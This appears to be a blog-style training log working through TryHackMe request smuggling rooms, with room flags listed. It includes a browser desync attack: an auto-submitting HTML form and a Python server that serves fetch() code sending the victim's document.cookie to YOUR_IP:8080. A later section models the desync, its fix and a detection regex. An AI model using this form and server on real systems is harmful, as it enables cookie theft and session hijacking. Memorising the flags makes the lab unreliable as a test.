Training Update v0.105


It’s Wednesday my dudes and we are carrying on with the HTTP/2 Request Smuggling room on THM!


Flag – THM{nom_nom_cookies}


Doesn’t work, & THM are the ones that direct you to this git repo.


Now we move on to the Request Smuggling: WebSockets room on THM!


Flag – THM{bf208caddc31c6bb52621fdc2b3a73e5}


This I could not understand. It was replying and reaching my Python server as stated in the question and room, but it would not process via Burp even though it was a copy and paste job… This is so fucking stupid?


Flag – THM{a87d4e5b777c010ed3266e59fb42ccac}


Next we move on to the HTTP Browser Desync room on THM.


Flag – THM{SMUGGLING_IS_FUN}

<form id="btn" action="http://challenge.thm/"
      method="POST"
      enctype="text/plain">
  <textarea name="GET http://YOUR_IP:1337 HTTP/1.1
AAA: A">placeholder1</textarea>
  <button type="submit">placeholder2</button>
</form>
<script> btn.submit() </script>

Finally, we will serve a payload on our controlled server to steal the user’s cookie and send it to us.

#!/usr/bin/python3
# Attacker-controlled server on port 1337: the smuggled GET lands here and the
# response body (a fetch() call) is delivered to the victim's browser.
from http.server import BaseHTTPRequestHandler, HTTPServer


class ExploitHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path == '/':
            self.send_response(200)
            # CORS header so the browser accepts the cross-origin response
            self.send_header("Access-Control-Allow-Origin", "*")
            self.send_header("Content-type", "text/html")
            self.end_headers()
            # Payload run by the victim: sends document.cookie to our port 8080 listener
            self.wfile.write(b"fetch('http://YOUR_IP:8080/' + document.cookie)")
        else:
            # Anything other than / gets a plain 404 instead of hanging the connection
            self.send_error(404)


def run_server(port=1337):
    server_address = ('', port)
    httpd = HTTPServer(server_address, ExploitHandler)
    print(f"Server running on port {port}")
    httpd.serve_forever()


if __name__ == '__main__':
    run_server()
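As an added example (not code from the THM room or from this post), the following models the desync the text/plain form above relies on. A keep-alive back end that answers the POST without reading its declared Content-Length body leaves those bytes on the connection; they are then parsed as the next request, and the victim's own following request (cookie included) is swallowed into its headers. Reading exactly Content-Length bytes before parsing the next request removes the condition, and the regex helper flags the text/plain-form signature for WAF or log review. The byte stream, YOUR_IP, the /account path and the session cookie value are all constructed placeholders.

```python
"""Model of an HTTP/1.1 connection desync and its fix (added example)."""
import re

# Constructed: the body a browser produces for the text/plain form above
# (field name, "=", field value, CRLF). It starts with an HTTP request line.
SMUGGLED_BODY = b"GET http://YOUR_IP:1337 HTTP/1.1\r\nAAA: A=placeholder1\r\n"

# Constructed: the victim's own next request on the same keep-alive connection.
VICTIM_FOLLOWUP = (
    b"GET /account HTTP/1.1\r\n"
    b"Host: challenge.thm\r\n"
    b"Cookie: session=constructed\r\n"
    b"\r\n"
)

# Content-Length is computed, so the POST framing itself is correct.
CONSTRUCTED_STREAM = (
    b"POST / HTTP/1.1\r\n"
    b"Host: challenge.thm\r\n"
    b"Content-Type: text/plain\r\n"
    + b"Content-Length: %d\r\n\r\n" % len(SMUGGLED_BODY)
    + SMUGGLED_BODY
    + VICTIM_FOLLOWUP
)


def parse_requests(stream: bytes, consume_body: bool):
    """Parse consecutive requests off one keep-alive connection.

    consume_body=False models a back end that answers the POST without reading
    the declared Content-Length bytes (the desync bug); consume_body=True is the
    correct behaviour. Returns a list of dicts with method, target, headers, body.
    """
    requests = []
    pos = 0
    while pos < len(stream):
        head_end = stream.find(b"\r\n\r\n", pos)
        if head_end == -1:
            break  # incomplete request head; wait for more bytes
        lines = stream[pos:head_end].decode("latin-1").split("\r\n")
        parts = lines[0].split(" ")
        if len(parts) != 3:
            break  # not a request line; a real server would reject the connection
        method, target, _version = parts
        headers = {}
        for line in lines[1:]:
            # Lines without a colon (e.g. a swallowed request line) are dropped,
            # which is exactly how the victim's request disappears into ours.
            if ":" in line:
                name, value = line.split(":", 1)
                headers[name.strip().lower()] = value.strip()
        pos = head_end + 4
        body = b""
        length = int(headers.get("content-length", "0"))
        if consume_body:
            # Fix: take exactly Content-Length bytes off the wire before
            # treating anything that follows as a new request.
            body = stream[pos:pos + length]
            pos += length
        requests.append({"method": method, "target": target,
                         "headers": headers, "body": body})
    return requests


# Detection: a POST body that begins with an HTTP/1.x request line is the
# signature this form produces; legitimate text/plain form bodies do not.
REQUEST_LINE = re.compile(rb"^(GET|POST|PUT|DELETE|HEAD|OPTIONS|PATCH) \S+ HTTP/1\.[01]\r?\n")


def looks_like_smuggled_request(body: bytes) -> bool:
    return REQUEST_LINE.match(body) is not None


def targets(stream: bytes, consume_body: bool):
    """Request targets as each parser sees them, for side-by-side comparison."""
    return [r["target"] for r in parse_requests(stream, consume_body)]


if __name__ == "__main__":
    print("desynced back end sees:", targets(CONSTRUCTED_STREAM, False))
    print("correct back end sees: ", targets(CONSTRUCTED_STREAM, True))
    print("body flagged:", looks_like_smuggled_request(SMUGGLED_BODY))
```

The desynced parse turns the body into a second request whose headers now carry the victim's Host and Cookie, which is why the attacker's server on port 1337 ends up answering the victim's request for /account. The correct parse keeps the same bytes as an inert POST body and sees /account as a normal request; closing the connection after any request whose body was not fully read is an equally valid fix.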

Until next time & don’t sleepwalk through life!

Jan mayampitaki